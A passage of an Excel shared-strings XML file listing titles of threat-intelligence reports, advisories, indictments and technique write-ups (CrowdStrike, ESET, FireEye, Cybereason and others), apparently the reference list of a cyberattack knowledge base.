  </si>
  <si>
    <t>Clymb3r Function Hook Passwords Sept 2013</t>
  </si>
  <si>
    <t>Cobalt Strike Arguments 2019</t>
  </si>
  <si>
    <t>Cobalt Strike Browser Pivot</t>
  </si>
  <si>
    <t>Cobalt Strike DCOM Jan 2017</t>
  </si>
  <si>
    <t>Cobalt Strike Manual 4.3 November 2020</t>
  </si>
  <si>
    <t>Cobalt Strike TTPs Dec 2017</t>
  </si>
  <si>
    <t>CobaltStrike Daddy May 2017</t>
  </si>
  <si>
    <t>CobaltStrike Scripted Web Delivery</t>
  </si>
  <si>
    <t>Code Injection on Linux and macOS</t>
  </si>
  <si>
    <t>Cofense Astaroth Sept 2018</t>
  </si>
  <si>
    <t>Cofense NanoCore Mar 2018</t>
  </si>
  <si>
    <t>Cofense RevengeRAT Feb 2019</t>
  </si>
  <si>
    <t>CoinTicker 2019</t>
  </si>
  <si>
    <t>Command Five SK 2011</t>
  </si>
  <si>
    <t>Comparitech Leak</t>
  </si>
  <si>
    <t>Conficker Nuclear Power Plant</t>
  </si>
  <si>
    <t>Configuring Data Access audit logs</t>
  </si>
  <si>
    <t>Confluence Linux Command  Line</t>
  </si>
  <si>
    <t>Confluence Logs</t>
  </si>
  <si>
    <t>Container Escape</t>
  </si>
  <si>
    <t>Content trust in Azure Container Registry</t>
  </si>
  <si>
    <t>Content trust in Docker</t>
  </si>
  <si>
    <t>CopyFromScreen .NET</t>
  </si>
  <si>
    <t>CopyKittens Nov 2015</t>
  </si>
  <si>
    <t>Core Security Impacket</t>
  </si>
  <si>
    <t>Corero SYN-ACKflood</t>
  </si>
  <si>
    <t>Corio 2008</t>
  </si>
  <si>
    <t>Costin Raiu IAmTheKing October 2020</t>
  </si>
  <si>
    <t>CounterCept PPID Spoofing Dec 2018</t>
  </si>
  <si>
    <t>CrowdStrike 2015 Global Threat Report</t>
  </si>
  <si>
    <t>CrowdStrike AQUATIC PANDA December 2021</t>
  </si>
  <si>
    <t>CrowdStrike BGH Ransomware 2021</t>
  </si>
  <si>
    <t>CrowdStrike BloodHound April 2018</t>
  </si>
  <si>
    <t>CrowdStrike Carbon Spider August 2021</t>
  </si>
  <si>
    <t>CrowdStrike Deep Panda Web Shells</t>
  </si>
  <si>
    <t>CrowdStrike Ember Bear Profile March 2022</t>
  </si>
  <si>
    <t xml:space="preserve">CrowdStrike Flying Kitten </t>
  </si>
  <si>
    <t>CrowdStrike GTR 2019</t>
  </si>
  <si>
    <t>CrowdStrike GTR 2021 June 2021</t>
  </si>
  <si>
    <t>CrowdStrike Grim Spider May 2019</t>
  </si>
  <si>
    <t>CrowdStrike IceApple May 2022</t>
  </si>
  <si>
    <t>CrowdStrike Labyrinth Chollima Feb 2022</t>
  </si>
  <si>
    <t>CrowdStrike Linux Rootkit</t>
  </si>
  <si>
    <t>CrowdStrike Manufacturing Threat July 2020</t>
  </si>
  <si>
    <t>CrowdStrike Outlook Forms</t>
  </si>
  <si>
    <t>CrowdStrike PIONEER KITTEN August 2020</t>
  </si>
  <si>
    <t>CrowdStrike Putter Panda</t>
  </si>
  <si>
    <t>CrowdStrike Richochet Chollima September 2021</t>
  </si>
  <si>
    <t>CrowdStrike Ryuk January 2019</t>
  </si>
  <si>
    <t>CrowdStrike SUNSPOT Implant January 2021</t>
  </si>
  <si>
    <t>CrowdStrike Silent Chollima Adversary September 2021</t>
  </si>
  <si>
    <t>CrowdStrike Stardust Chollima Profile April 2018</t>
  </si>
  <si>
    <t>CrowdStrike StellarParticle January 2022</t>
  </si>
  <si>
    <t>CrowdStrike VENOMOUS BEAR</t>
  </si>
  <si>
    <t>CrowdStrike VOODOO BEAR</t>
  </si>
  <si>
    <t>CrowdStrike Wizard Spider March 2019</t>
  </si>
  <si>
    <t>CrowdStrike Wizard Spider October 2020</t>
  </si>
  <si>
    <t>Crowdstrike CrowdCast Oct 2013</t>
  </si>
  <si>
    <t>Crowdstrike DNC June 2016</t>
  </si>
  <si>
    <t>Crowdstrike DNS Hijack 2019</t>
  </si>
  <si>
    <t>Crowdstrike DriveSlayer February 2022</t>
  </si>
  <si>
    <t>Crowdstrike EvilCorp March 2021</t>
  </si>
  <si>
    <t>Crowdstrike GTR2020 Mar 2020</t>
  </si>
  <si>
    <t>Crowdstrike Global Threat Report Feb 2018</t>
  </si>
  <si>
    <t>Crowdstrike Helix Kitten Nov 2018</t>
  </si>
  <si>
    <t>Crowdstrike Hiding in Plain Sight 2018</t>
  </si>
  <si>
    <t>Crowdstrike Indrik November 2018</t>
  </si>
  <si>
    <t>Crowdstrike KRYPTONITE PANDA August 2018</t>
  </si>
  <si>
    <t>Crowdstrike Kubernetes Container Escape</t>
  </si>
  <si>
    <t>Crowdstrike MUSTANG PANDA June 2018</t>
  </si>
  <si>
    <t>Crowdstrike Mythic Leopard Profile</t>
  </si>
  <si>
    <t>Crowdstrike PartyTicket March 2022</t>
  </si>
  <si>
    <t>Crowdstrike Pirate Panda April 2020</t>
  </si>
  <si>
    <t>Crowdstrike Qakbot October 2020</t>
  </si>
  <si>
    <t>Crowdstrike WhisperGate January 2022</t>
  </si>
  <si>
    <t>CrySyS Blog TeamSpy</t>
  </si>
  <si>
    <t>Crysys Skywiper</t>
  </si>
  <si>
    <t>Cyber Forensicator Silence Jan 2019</t>
  </si>
  <si>
    <t>CyberArk Labs Safe Mode 2016</t>
  </si>
  <si>
    <t>CyberBit Dtrack</t>
  </si>
  <si>
    <t>CyberBit Early Bird Apr 2018</t>
  </si>
  <si>
    <t>CyberBit System Calls</t>
  </si>
  <si>
    <t>CyberESI GTALK</t>
  </si>
  <si>
    <t>CyberScoop APT28 Nov 2018</t>
  </si>
  <si>
    <t>CyberScoop Babuk February 2021</t>
  </si>
  <si>
    <t>CyberScoop BlackOasis Oct 2017</t>
  </si>
  <si>
    <t>CyberScoop FIN7 Oct 2017</t>
  </si>
  <si>
    <t>Cyberark Golden SAML</t>
  </si>
  <si>
    <t>Cyberciti Trap Statements</t>
  </si>
  <si>
    <t>Cybereason Astaroth Feb 2019</t>
  </si>
  <si>
    <t>Cybereason Bazar July 2020</t>
  </si>
  <si>
    <t>Cybereason Bumblebee August 2022</t>
  </si>
  <si>
    <t>Cybereason Chaes Nov 2020</t>
  </si>
  <si>
    <t>Cybereason Clop Dec 2020</t>
  </si>
  <si>
    <t>Cybereason Cobalt Kitty 2017</t>
  </si>
  <si>
    <t>Cybereason Conti Jan 2021</t>
  </si>
  <si>
    <t>Cybereason Dissecting DGAs</t>
  </si>
  <si>
    <t>Cybereason Egregor Nov 2020</t>
  </si>
  <si>
    <t>Cybereason Kimsuky November 2020</t>
  </si>
  <si>
    <t>Cybereason Linux Exim Worm</t>
  </si>
  <si>
    <t>Cybereason Molerats Dec 2020</t>
  </si>
  <si>
    <t>Cybereason Nocturnus MedusaLocker 2020</t>
  </si>
  <si>
    <t>Cybereason OSX Pirrit</t>
  </si>
  <si>
    <t>Cybereason Oceanlotus May 2017</t>
  </si>
  <si>
    <t>Cybereason OperationCuckooBees May 2022</t>
  </si>
  <si>
    <t>Cybereason PowerLess February 2022</t>
  </si>
  <si>
    <t>Cybereason Soft Cell June 2019</t>
  </si>
  <si>
    <t>Cybereason StrifeWater Feb 2022</t>
  </si>
  <si>
    <t>Cybereason TA505 April 2019</t>
  </si>
  <si>
    <t>Cybereason Valak May 2020</t>
  </si>
  <si>
    <t>Cybereason WhisperGate February 2022</t>
  </si>
  <si>
    <t>Cyberint Qakbot May 2021</t>
  </si>
  <si>
    <t>Cyberreason Anchor December 2019</t>
  </si>
  <si>
    <t>Cyberreason DCOM DDE Lateral Movement Nov 2017</t>
  </si>
  <si>
    <t>Cybersecurity Advisory GRU Brute Force Campaign July 2021</t>
  </si>
  <si>
    <t>Cybersecurity Advisory SVR TTP May 2021</t>
  </si>
  <si>
    <t>Cyble Egregor Oct 2020</t>
  </si>
  <si>
    <t>Cyble Sidewinder September 2020</t>
  </si>
  <si>
    <t>Cybleinc Conti January 2020</t>
  </si>
  <si>
    <t>Cycraft Chimera April 2020</t>
  </si>
  <si>
    <t>Cylance Cleaver</t>
  </si>
  <si>
    <t>Cylance Dust Storm</t>
  </si>
  <si>
    <t>Cylance Machete Mar 2017</t>
  </si>
  <si>
    <t>Cylance Putter Panda</t>
  </si>
  <si>
    <t>Cylance Redirect to SMB</t>
  </si>
  <si>
    <t>Cylance Reg Persistence Sept 2013</t>
  </si>
  <si>
    <t>Cylance Shaheen Nov 2018</t>
  </si>
  <si>
    <t>Cylance Shell Crew Feb 2017</t>
  </si>
  <si>
    <t>Cylance Sodinokibi July 2019</t>
  </si>
  <si>
    <t>Cymmetria Patchwork</t>
  </si>
  <si>
    <t>Cynet Ragnar Apr 2020</t>
  </si>
  <si>
    <t>Cyphort EvilBunny Dec 2014</t>
  </si>
  <si>
    <t>Cyware Ngrok May 2019</t>
  </si>
  <si>
    <t>Cyware Social Media</t>
  </si>
  <si>
    <t>D3Secutrity CTI Feeds</t>
  </si>
  <si>
    <t>DBAPPSecurity BITTER zero-day Feb 2021</t>
  </si>
  <si>
    <t>DCShadow Blog</t>
  </si>
  <si>
    <t>DD Man</t>
  </si>
  <si>
    <t>DEFCON2016 Sticky Keys</t>
  </si>
  <si>
    <t>DFIR Conti Bazar Nov 2021</t>
  </si>
  <si>
    <t>DFIR Diavol Ransomware December 2021</t>
  </si>
  <si>
    <t>DFIR Pysa Nov 2020</t>
  </si>
  <si>
    <t>DFIR Report APT35 ProxyShell March 2022</t>
  </si>
  <si>
    <t>DFIR Report Gootloader</t>
  </si>
  <si>
    <t>DFIR Ryuk 2 Hour Speed Run November 2020</t>
  </si>
  <si>
    <t>DFIR Ryuk in 5 Hours October 2020</t>
  </si>
  <si>
    <t>DFIR Ryuk's Return October 2020</t>
  </si>
  <si>
    <t>DHS CISA AA22-055A MuddyWater February 2022</t>
  </si>
  <si>
    <t>DHS/CISA Ransomware Targeting Healthcare October 2020</t>
  </si>
  <si>
    <t>DNS Dumpster</t>
  </si>
  <si>
    <t>DOJ  - Cisco Insider</t>
  </si>
  <si>
    <t>DOJ APT10 Dec 2018</t>
  </si>
  <si>
    <t>DOJ FIN7 Aug 2018</t>
  </si>
  <si>
    <t>DOJ GRU Indictment Jul 2018</t>
  </si>
  <si>
    <t>DOJ Iran Indictments March 2018</t>
  </si>
  <si>
    <t>DOJ Iran Indictments September 2020</t>
  </si>
  <si>
    <t>DOJ Lazarus Sony 2018</t>
  </si>
  <si>
    <t>DOJ North Korea Indictment Feb 2021</t>
  </si>
  <si>
    <t>DOJ Russia Targeting Critical Infrastructure March 2022</t>
  </si>
  <si>
    <t>DRIFTWOOD</t>
  </si>
  <si>
    <t>DUEBREW</t>
  </si>
  <si>
    <t>DanielManea Emotet May 2017</t>
  </si>
  <si>
    <t>Dark Clouds_Usenix_Mulazzani_08_2011</t>
  </si>
  <si>
    <t>Dark Reading APT39 JAN 2019</t>
  </si>
  <si>
    <t>Dark Reading Codoso Feb 2015</t>
  </si>
  <si>
    <t>DarkReading FireEye FIN5 Oct 2015</t>
  </si>
  <si>
    <t>DarkReading FireEye SolarWinds</t>
  </si>
  <si>
    <t>DarkSide Ransomware Gang</t>
  </si>
  <si>
    <t>Darkside Ransomware Cybereason</t>
  </si>
  <si>
    <t>Data Destruction - Threat Post</t>
  </si>
  <si>
    <t>Data Driven Security DGA</t>
  </si>
  <si>
    <t>Davidson Windows</t>
  </si>
  <si>
    <t>Death by 1000 installers; it's all broken!</t>
  </si>
  <si>
    <t>Debian Manual Maintainer Scripts</t>
  </si>
  <si>
    <t>Debian nbtscan Nov 2019</t>
  </si>
  <si>
    <t>Deep Instinct TA505 Apr 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Default VBS macros Blocking </t>
  </si>
  <si>
    <t>Defending Against Scheduled Task Attacks in Windows Environments</t>
  </si>
  <si>
    <t>Dell Dridex Oct 2015</t>
  </si>
  <si>
    <t>Dell Lateral Movement</t>
  </si>
  <si>
    <t>Dell P2P ZeuS</t>
  </si>
  <si>
    <t>Dell Sakula</t>
  </si>
  <si>
    <t>Dell Skeleton</t>
  </si>
  <si>
    <t>Dell TG-1314</t>
  </si>
  <si>
    <t>Dell TG-3390</t>
  </si>
  <si>
    <t>Dell Threat Group 2889</t>
  </si>
  <si>
    <t>Dell WMI Persistence</t>
  </si>
  <si>
    <t>Dell Wiper</t>
  </si>
  <si>
    <t>Deloitte Environment Awareness</t>
  </si>
  <si>
    <t>Delpy Mimikatz Crendential Manager</t>
  </si>
  <si>
    <t>Demaske Netsh Persistence</t>
  </si>
  <si>
    <t>Demiguise Guardrail Router Logo</t>
  </si>
  <si>
    <t>Demystifying Azure AD Service Principals</t>
  </si>
  <si>
    <t>Deply Mimikatz</t>
  </si>
  <si>
    <t>Dept. of Treasury Iran Sanctions September 2020</t>
  </si>
  <si>
    <t>DescribeSecurityGroups - Amazon Elastic Compute Cloud</t>
  </si>
  <si>
    <t>Designing Daemons Apple Dev</t>
  </si>
  <si>
    <t>Detectify Slack Tokens</t>
  </si>
  <si>
    <t>Detecting Command &amp; Control in the Cloud</t>
  </si>
  <si>
    <t>Detecting Rclone</t>
  </si>
  <si>
    <t>Didier Stevens WebDAV Traffic</t>
  </si>
  <si>
    <t>DidierStevens SelectMyParent Nov 2009</t>
  </si>
  <si>
    <t>DieNet Bash</t>
  </si>
  <si>
    <t>DigiCert Install SSL Cert</t>
  </si>
  <si>
    <t>DigiTrust Agent Tesla Jan 2017</t>
  </si>
  <si>
    <t>DigiTrust NanoCore Jan 2017</t>
  </si>
  <si>
    <t>DiginotarCompromise</t>
  </si>
  <si>
    <t>DigitalShadows CDN</t>
  </si>
  <si>
    <t>Dingledine Tor The Second-Generation Onion Router</t>
  </si>
  <si>
    <t>Directory Services Internals DPAPI Backup Keys Oct 2015</t>
  </si>
  <si>
    <t>Disable automount for ISO</t>
  </si>
  <si>
    <t>Disable_Win_Event_Logging</t>
  </si>
  <si>
    <t>District Court of NY APT10 Indictment December 2018</t>
  </si>
  <si>
    <t>Docker API</t>
  </si>
  <si>
    <t>Docker Bind Mounts</t>
  </si>
  <si>
    <t>Docker Build Image</t>
  </si>
  <si>
    <t>Docker Containers API</t>
  </si>
  <si>
    <t>Docker Daemon CLI</t>
  </si>
  <si>
    <t>Docker Daemon Socket Protect</t>
  </si>
  <si>
    <t>Docker Docs Container</t>
  </si>
  <si>
    <t>Docker Entrypoint</t>
  </si>
  <si>
    <t>Docker Exec</t>
  </si>
  <si>
    <t>Docker Images</t>
  </si>
  <si>
    <t>Docker Overview</t>
  </si>
  <si>
    <t>Domain_Steal_CC</t>
  </si>
  <si>
    <t>Donut Github</t>
  </si>
  <si>
    <t>Dormann Dangers of VHD 2019</t>
  </si>
  <si>
    <t>Dragos Crashoverride 2017</t>
  </si>
  <si>
    <t>Dragos Crashoverride 2018</t>
  </si>
  <si>
    <t xml:space="preserve">Dragos DYMALLOY </t>
  </si>
  <si>
    <t>Dragos EKANS</t>
  </si>
  <si>
    <t>Dragos ELECTRUM</t>
  </si>
  <si>
    <t>Dragos Heroku Watering Hole</t>
  </si>
  <si>
    <t>Dragos Hexane</t>
  </si>
  <si>
    <t>Dragos IT ICS Ransomware</t>
  </si>
  <si>
    <t xml:space="preserve">Dragos PARISITE </t>
  </si>
  <si>
    <t>Dragos Raspite Aug 2018</t>
  </si>
  <si>
    <t>Dragos TALONITE</t>
  </si>
  <si>
    <t>Dragos Threat Report 2020</t>
  </si>
  <si>
    <t>Dragos WASSONITE</t>
  </si>
  <si>
    <t>Dragos Xenotime 2018</t>
  </si>
  <si>
    <t>Drakonia HInvoke</t>
  </si>
  <si>
    <t>DustySky2</t>
  </si>
  <si>
    <t>EA Hacked via Slack - June 2021</t>
  </si>
  <si>
    <t>EFF Manul Aug 2016</t>
  </si>
  <si>
    <t>EK Clueless Agents</t>
  </si>
  <si>
    <t>EK Impeding Malware Analysis</t>
  </si>
  <si>
    <t>ELC Extended Attributes</t>
  </si>
  <si>
    <t>ELC Running at startup</t>
  </si>
  <si>
    <t>ELF Injection May 2009</t>
  </si>
  <si>
    <t>ENSIL AtomBombing Oct 2016</t>
  </si>
  <si>
    <t>ESEST Black Energy Jan 2016</t>
  </si>
  <si>
    <t>ESET Attor Oct 2019</t>
  </si>
  <si>
    <t>ESET BackdoorDiplomacy Jun 2021</t>
  </si>
  <si>
    <t>ESET Bad Rabbit</t>
  </si>
  <si>
    <t>ESET BlackEnergy Jan 2016</t>
  </si>
  <si>
    <t>ESET Buhtrap and Buran April 2019</t>
  </si>
  <si>
    <t>ESET CaddyWiper March 2022</t>
  </si>
  <si>
    <t>ESET Carberp March 2012</t>
  </si>
  <si>
    <t>ESET Carbon Mar 2017</t>
  </si>
  <si>
    <t>ESET Casbaneiro Oct 2019</t>
  </si>
  <si>
    <t>ESET ComRAT May 2020</t>
  </si>
  <si>
    <t>ESET Crutch December 2020</t>
  </si>
  <si>
    <t>ESET DazzleSpy Jan 2022</t>
  </si>
  <si>
    <t>ESET Dukes October 2019</t>
  </si>
  <si>
    <t>ESET Ebury Feb 2014</t>
  </si>
  <si>
    <t>ESET Ebury Oct 2017</t>
  </si>
  <si>
    <t>ESET Emotet Dec 2018</t>
  </si>
  <si>
    <t>ESET Emotet Nov 2018</t>
  </si>
  <si>
    <t>ESET EvilNum July 2020</t>
  </si>
  <si>
    <t>ESET Exchange Mar 2021</t>
  </si>
  <si>
    <t>ESET FinFisher Jan 2018</t>
  </si>
  <si>
    <t>ESET ForSSHe December 2018</t>
  </si>
  <si>
    <t>ESET Gamaredon June 2020</t>
  </si>
  <si>
    <t>ESET Gazer Aug 2017</t>
  </si>
  <si>
    <t>ESET Gelsemium June 2021</t>
  </si>
  <si>
    <t>ESET Grandoreiro April 2020</t>
  </si>
  <si>
    <t>ESET GreyEnergy Oct 2018</t>
  </si>
  <si>
    <t>ESET Hermetic Wiper February 2022</t>
  </si>
  <si>
    <t>ESET Hermetic Wizard March 2022</t>
  </si>
  <si>
    <t>ESET IIS Malware 2021</t>
  </si>
  <si>
    <t>ESET Industroyer</t>
  </si>
  <si>
    <t>ESET InvisiMole June 2018</t>
  </si>
  <si>
    <t>ESET InvisiMole June 2020</t>
  </si>
  <si>
    <t>ESET Kobalos Feb 2021</t>
  </si>
  <si>
    <t>ESET Kobalos Jan 2021</t>
  </si>
  <si>
    <t>ESET Lazarus Jun 2020</t>
  </si>
  <si>
    <t>ESET Lazarus KillDisk April 2018</t>
  </si>
  <si>
    <t>ESET LightNeuron May 2019</t>
  </si>
  <si>
    <t>ESET LoJax Sept 2018</t>
  </si>
  <si>
    <t>ESET LoudMiner June 2019</t>
  </si>
  <si>
    <t>ESET Machete July 2019</t>
  </si>
  <si>
    <t>ESET Nomadic Octopus 2018</t>
  </si>
  <si>
    <t>ESET OceanLotus</t>
  </si>
  <si>
    <t>ESET OceanLotus Mar 2019</t>
  </si>
  <si>
    <t>ESET OceanLotus macOS April 2019</t>
  </si>
  <si>
    <t>ESET Okrum July 2019</t>
  </si>
  <si>
    <t>ESET Operation Groundbait</t>
  </si>
  <si>
    <t>ESET Operation Spalax Jan 2021</t>
  </si>
  <si>
    <t>ESET PLEAD Malware July 2018</t>
  </si>
  <si>
    <t>ESET PipeMon May 2020</t>
  </si>
  <si>
    <t>ESET PowerPool Code October 2020</t>
  </si>
  <si>
    <t>ESET RTM Feb 2017</t>
  </si>
  <si>
    <t>ESET Recon Snake Nest</t>
  </si>
  <si>
    <t>ESET Sednit 2017 Activity</t>
  </si>
  <si>
    <t>ESET Sednit July 2015</t>
  </si>
  <si>
    <t>ESET Sednit Part 1</t>
  </si>
  <si>
    <t>ESET Sednit Part 2</t>
  </si>
  <si>
    <t>ESET Sednit Part 3</t>
  </si>
  <si>
    <t>ESET Sednit USBStealer 2014</t>
  </si>
  <si>
    <t>ESET Stuxnet Under the Microscope</t>
  </si>
  <si>
    <t>ESET T3 Threat Report 2021</t>
  </si>
  <si>
    <t>ESET TeleBots Oct 2018</t>
  </si>
  <si>
    <t>ESET Telebots Dec 2016</t>
  </si>
  <si>
    <t>ESET Telebots July 2017</t>
  </si>
  <si>
    <t>ESET Telebots June 2017</t>
  </si>
  <si>
    <t>ESET Trickbot Oct 2020</t>
  </si>
  <si>
    <t>ESET Turla August 2018</t>
  </si>
  <si>
    <t>ESET Turla Mosquito Jan 2018</t>
  </si>
  <si>
    <t>ESET Turla Mosquito May 2018</t>
  </si>
  <si>
    <t>ESET Turla PowerShell May 2019</t>
  </si>
  <si>
    <t>ESET Twitter Ida Pro Nov 2021</t>
  </si>
  <si>
    <t>ESET Windigo Mar 2014</t>
  </si>
  <si>
    <t>ESET Zebrocy May 2019</t>
  </si>
  <si>
    <t>ESET Zebrocy Nov 2018</t>
  </si>
  <si>
    <t>ESF_filemonitor</t>
  </si>
  <si>
    <t>EST Kimsuky April 2019</t>
  </si>
  <si>
    <t>EST Kimsuky SmokeScreen April 2019</t>
  </si>
  <si>
    <t>Ebowla: Genetic Malware</t>
  </si>
  <si>
    <t>EclecticLightChecksonEXECodeSigning</t>
  </si>
  <si>
    <t>Eclypsium Trickboot December 2020</t>
  </si>
  <si>
    <t>EduardosBlog SIPs July 2008</t>
  </si>
  <si>
    <t>Elastic - Hunting for Persistence Part 1</t>
  </si>
  <si>
    <t>Elastic - Koadiac Detection with EQL</t>
  </si>
  <si>
    <t>Elastic COM Hijacking</t>
  </si>
  <si>
    <t>Elastic HuntingNMemory June 2017</t>
  </si>
  <si>
    <t>Elastic Masquerade Ball</t>
  </si>
  <si>
    <t>Elastic Predicting DGA</t>
  </si>
  <si>
    <t>Elastic Process Injection July 2017</t>
  </si>
  <si>
    <t>EldoS RawDisk ITpro</t>
  </si>
  <si>
    <t>Emissary Trojan Feb 2016</t>
  </si>
  <si>
    <t>Empire InvokeKerberoast Oct 2016</t>
  </si>
  <si>
    <t>Empire Keychain Decrypt</t>
  </si>
  <si>
    <t>Endurant CMSTP July 2018</t>
  </si>
  <si>
    <t>Enigma DCOM Lateral Movement Jan 2017</t>
  </si>
  <si>
    <t>Enigma Excel DCOM Sept 2017</t>
  </si>
  <si>
    <t>Enigma MMC20 COM Jan 2017</t>
  </si>
  <si>
    <t>Enigma Outlook DCOM Lateral Movement Nov 2017</t>
  </si>
  <si>
    <t>Enigma Phishing for Credentials Jan 2015</t>
  </si>
  <si>
    <t>Enigma Reviving DDE Jan 2018</t>
  </si>
  <si>
    <t>Enigma0x3 PubPrn Bypass</t>
  </si>
  <si>
    <t>Entrust Enable CAPI2 Aug 2017</t>
  </si>
  <si>
    <t>Environmental Keyed HTA</t>
  </si>
  <si>
    <t>Eset Ramsay May 2020</t>
  </si>
  <si>
    <t>Europol Cobalt Mar 2018</t>
  </si>
  <si>
    <t>EventLog_Core_Technologies</t>
  </si>
  <si>
    <t>EventTracker File Permissions Feb 2014</t>
  </si>
  <si>
    <t>Evi1cg Forfiles Nov 2017</t>
  </si>
  <si>
    <t>Evil Clippy May 2019</t>
  </si>
  <si>
    <t>Evilginx 2 July 2018</t>
  </si>
  <si>
    <t>Eweek Newscaster and Charming Kitten May 2014</t>
  </si>
  <si>
    <t>ExchangePowerShell Module</t>
  </si>
  <si>
    <t>Executable Installers are Vulnerable</t>
  </si>
  <si>
    <t>Expel AWS Attacker</t>
  </si>
  <si>
    <t>Expel Behind the Scenes</t>
  </si>
  <si>
    <t>Expel IO Evil in AWS</t>
  </si>
  <si>
    <t>Exploit Database</t>
  </si>
  <si>
    <t>Exploit Monday WinDbg</t>
  </si>
  <si>
    <t>ExploitDB GoogleHacking</t>
  </si>
  <si>
    <t xml:space="preserve">Exploiting Smartphone USB </t>
  </si>
  <si>
    <t>External to DA, the OS X Way</t>
  </si>
  <si>
    <t>EyeofRa Detecting Hooking June 2017</t>
  </si>
  <si>
    <t>F-Secure BlackEnergy 2014</t>
  </si>
  <si>
    <t>F-Secure Cosmicduke</t>
  </si>
  <si>
    <t>F-Secure CozyDuke</t>
  </si>
  <si>
    <t>F-Secure Lazarus Cryptocurrency Aug 2020</t>
  </si>
  <si>
    <t>F-Secure Sofacy 2015</t>
  </si>
  <si>
    <t>F-Secure The Dukes</t>
  </si>
  <si>
    <t>FBI FLASH APT39 September 2020</t>
  </si>
  <si>
    <t>FBI Flash Diavol January 2022</t>
  </si>
  <si>
    <t>FBI Flash FIN7 USB</t>
  </si>
  <si>
    <t>FBI Ragnar Locker 2020</t>
  </si>
  <si>
    <t>FIENDCRY</t>
  </si>
  <si>
    <t>FOX-IT May 2016 Mofang</t>
  </si>
  <si>
    <t>FSI Andariel Campaign Rifle July 2017</t>
  </si>
  <si>
    <t>FSISAC FraudNetDoS September 2012</t>
  </si>
  <si>
    <t>FSecure Hupigon</t>
  </si>
  <si>
    <t>FSecure Lokibot November 2019</t>
  </si>
  <si>
    <t>Fast Flux - Welivesecurity</t>
  </si>
  <si>
    <t>Fidelis Hi-Zor</t>
  </si>
  <si>
    <t>Fidelis INOCNATION</t>
  </si>
  <si>
    <t>Fidelis TrickBot Oct 2016</t>
  </si>
  <si>
    <t>Fidelis Turbo</t>
  </si>
  <si>
    <t>Fidelis njRAT June 2013</t>
  </si>
  <si>
    <t>Fifield Blocking Resistent Communication through domain fronting 2015</t>
  </si>
  <si>
    <t>FinFisher Citation</t>
  </si>
  <si>
    <t xml:space="preserve">FinFisher exposed </t>
  </si>
  <si>
    <t>FireEye 2019 Apple Remote Desktop</t>
  </si>
  <si>
    <t>FireEye ADFS</t>
  </si>
  <si>
    <t>FireEye APT Groups</t>
  </si>
  <si>
    <t>FireEye APT10 April 2017</t>
  </si>
  <si>
    <t>FireEye APT10 Sept 2018</t>
  </si>
  <si>
    <t>FireEye APT17</t>
  </si>
  <si>
    <t>FireEye APT19</t>
  </si>
  <si>
    <t>FireEye APT28</t>
  </si>
  <si>
    <t>FireEye APT28 Hospitality Aug 2017</t>
  </si>
  <si>
    <t>FireEye APT28 January 2017</t>
  </si>
  <si>
    <t>FireEye APT29</t>
  </si>
  <si>
    <t>FireEye APT29 Domain Fronting</t>
  </si>
  <si>
    <t>FireEye APT29 Domain Fronting With TOR March 2017</t>
  </si>
  <si>
    <t>FireEye APT29 Nov 2018</t>
  </si>
  <si>
    <t>FireEye APT30</t>
  </si>
  <si>
    <t>FireEye APT32 April 2020</t>
  </si>
  <si>
    <t>FireEye APT32 May 2017</t>
  </si>
  <si>
    <t>FireEye APT33 Guardrail</t>
  </si>
  <si>
    <t>FireEye APT33 Sept 2017</t>
  </si>
  <si>
    <t>FireEye APT33 Webinar Sept 2017</t>
  </si>
  <si>
    <t>FireEye APT34 Dec 2017</t>
  </si>
  <si>
    <t>FireEye APT34 July 2019</t>
  </si>
  <si>
    <t>FireEye APT34 Webinar Dec 2017</t>
  </si>
  <si>
    <t>FireEye APT35 2018</t>
  </si>
  <si>
    <t>FireEye APT37 Feb 2018</t>
  </si>
  <si>
    <t>FireEye APT38 Oct 2018</t>
  </si>
  <si>
    <t>FireEye APT39 Jan 2019</t>
  </si>
  <si>
    <t>FireEye APT40 March 2019</t>
  </si>
  <si>
    <t>FireEye APT41 2019</t>
  </si>
  <si>
    <t>FireEye APT41 Aug 2019</t>
  </si>
  <si>
    <t>FireEye APT41 March 2020</t>
  </si>
  <si>
    <t>FireEye Application Shimming</t>
  </si>
  <si>
    <t>FireEye Attacks Leveraging HTA</t>
  </si>
  <si>
    <t>FireEye BOOTRASH SANS</t>
  </si>
  <si>
    <t>FireEye Bootkits</t>
  </si>
  <si>
    <t>FireEye CARBANAK June 2017</t>
  </si>
  <si>
    <t>FireEye CFR Watering Hole 2012</t>
  </si>
  <si>
    <t>FireEye Chinese Espionage October 2019</t>
  </si>
  <si>
    <t>FireEye Clandestine Fox</t>
  </si>
  <si>
    <t>FireEye Clandestine Fox Part 2</t>
  </si>
  <si>
    <t>FireEye Clandestine Wolf</t>
  </si>
  <si>
    <t>FireEye Cyber Threats to Media Industries</t>
  </si>
  <si>
    <t>FireEye DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>FireEye DLL Side-Loading</t>
  </si>
  <si>
    <t>FireEye DNS Hijack 2019</t>
  </si>
  <si>
    <t>FireEye DeputyDog 9002 November 2013</t>
  </si>
  <si>
    <t>FireEye EPS Awakens Part 2</t>
  </si>
  <si>
    <t>FireEye Exchange Zero Days March 2021</t>
  </si>
  <si>
    <t>FireEye FELIXROOT July 2018</t>
  </si>
  <si>
    <t>FireEye FIN10 June 2017</t>
  </si>
  <si>
    <t>FireEye FIN4 Stealing Insider NOV 2014</t>
  </si>
  <si>
    <t>FireEye FIN6 Apr 2019</t>
  </si>
  <si>
    <t>FireEye FIN6 April 2016</t>
  </si>
  <si>
    <t>FireEye FIN7 April 2017</t>
  </si>
  <si>
    <t>FireEye FIN7 Aug 2018</t>
  </si>
  <si>
    <t>FireEye FIN7 March 2017</t>
  </si>
  <si>
    <t>FireEye FIN7 Oct 2019</t>
  </si>
  <si>
    <t>FireEye FIN7 Shim Databases</t>
  </si>
  <si>
    <t>FireEye Fin8 May 2016</t>
  </si>
  <si>
    <t>FireEye FinSpy Sept 2017</t>
  </si>
  <si>
    <t>FireEye Financial Actors Moving into OT</t>
  </si>
  <si>
    <t>FireEye FiveHands April 2021</t>
  </si>
  <si>
    <t>FireEye HAWKBALL Jun 2019</t>
  </si>
  <si>
    <t>FireEye HIKIT Rootkit Part 2</t>
  </si>
  <si>
    <t>FireEye Hacking FIN4 Dec 2014</t>
  </si>
  <si>
    <t>FireEye Hacking FIN4 Video Dec 2014</t>
  </si>
  <si>
    <t>FireEye Hacking Team</t>
  </si>
  <si>
    <t>FireEye Hancitor</t>
  </si>
  <si>
    <t>FireEye HawkEye Malware July 2017</t>
  </si>
  <si>
